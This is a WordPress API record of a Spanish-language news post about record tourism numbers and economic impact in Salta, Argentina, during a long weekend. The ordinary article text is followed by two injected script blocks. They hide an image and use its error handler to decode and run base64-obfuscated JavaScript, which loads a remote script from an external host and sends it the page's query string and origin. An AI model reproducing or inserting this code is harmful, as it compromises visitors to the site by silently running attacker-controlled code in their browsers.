{"id":3181,"date":"2023-10-17T09:05:17","date_gmt":"2023-10-17T12:05:17","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3181"},"modified":"2025-08-14T00:07:13","modified_gmt":"2025-08-14T03:07:13","slug":"fin-de-semana-largo-mas-de-2-286-millones-de-impacto-economico-generados-por-25-mil-turistas-en-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3181","title":{"rendered":"Fin de semana largo: M\u00e1s de $2.286 millones de impacto econ\u00f3mico generados por 25 mil turistas en Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#bf1c44\"><em>Datos estad\u00edsticos del Ministerio de Turismo y Deportes de Salta indican que se registraron picos de ocupaci\u00f3n del 97%.<\/em><\/h4>\n\n\n\n<p><strong>El Ministerio de Turismo y Deportes de Salta<\/strong>&nbsp;inform\u00f3 de 25.505 turistas registrados en alojamientos de toda la provincia durante el fin de semana largo, que impact\u00f3 en 53.754 noches contratadas (pernoctaciones). La tasa neta de ocupaci\u00f3n fue de 83,7% con picos del 97%.<\/p>\n\n\n\n<p>Los destinos destacados durante el fin de semana fueron Cachi, Coronel Moldes, San Antonio de los Cobres, Cafayate, Ciudad de Salta, Rosario de la Frontera, San Lorenzo y Molinos. En este sentido, el gasto por turista fue de $36.000 diarios y el impacto econ\u00f3mico de $2.286.650.852.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9426-fin-de-semana-largo-20231016184604.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9426-fin-de-semana-largo-20231016184604.jpeg\" alt=\"Fin de semana largo\"\/><\/a><\/figure>\n\n\n\n<p>\u201cDurante el a\u00f1o realizamos un intenso trabajo de promoci\u00f3n nacional e internacional en mercados que para el destino Salta son prioritarios. Adem\u00e1s, el programa Previaje V viene a reforzar el posicionamiento de la provincia como uno de los destinos l\u00edderes\u201d, afirm\u00f3 el ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;quien tambi\u00e9n se refiri\u00f3 al plan Liderar. \u201cSeguimos en l\u00ednea con una planificaci\u00f3n estrat\u00e9gica y una gesti\u00f3n encabezada por el gobernador&nbsp;<strong>Gustavo S\u00e1enz<\/strong>, que nos posibilita crecer en la actividad, tanto en infraestructura p\u00fablica, como una contraparte de inversi\u00f3n privada que generan m\u00e1s turistas y empleo en Salta\u201d.<\/p>\n\n\n\n<p>El presidente de la C\u00e1mara de Turismo de Salta, Juan Lucero, sostuvo que \u201clas calles estuvieron llenas de turistas, estamos hablando del fin de semana m\u00e1s fuerte del a\u00f1o. Es producto de un trabajo que viene realizando el Ministerio junto con la C\u00e1mara, de promoci\u00f3n en el mercado nacional, del internacional con caravanas y presencia en los mercados regionales\u201d, dijo el referente del sector privado, quien defini\u00f3 el programa Previaje como \u201cuna herramienta exitosa que Salta la ha sabido aprovechar para estar entre los destinos m\u00e1s elegidos\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9427-fin-de-semana-largo-20231016184630.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9427-fin-de-semana-largo-20231016184630.jpeg\" alt=\"Fin de semana largo\"\/><\/a><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Galer\u00eda de Fotos<\/h2>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Datos estad\u00edsticos del Ministerio de Turismo y Deportes de Salta indican que se registraron picos de ocupaci\u00f3n del 97%. El Ministerio de Turismo y Deportes de Salta&nbsp;inform\u00f3 de 25.505 turistas registrados en alojamientos de toda la provincia durante el fin de semana largo, que impact\u00f3 en 53.754 noches contratadas (pernoctaciones). La tasa neta de ocupaci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3182,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,15],"tags":[],"class_list":{"0":"post-3181","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3181"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3181"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3181\/revisions"}],"predecessor-version":[{"id":6946,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3181\/revisions\/6946"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3182"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3181"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3181"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3181"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}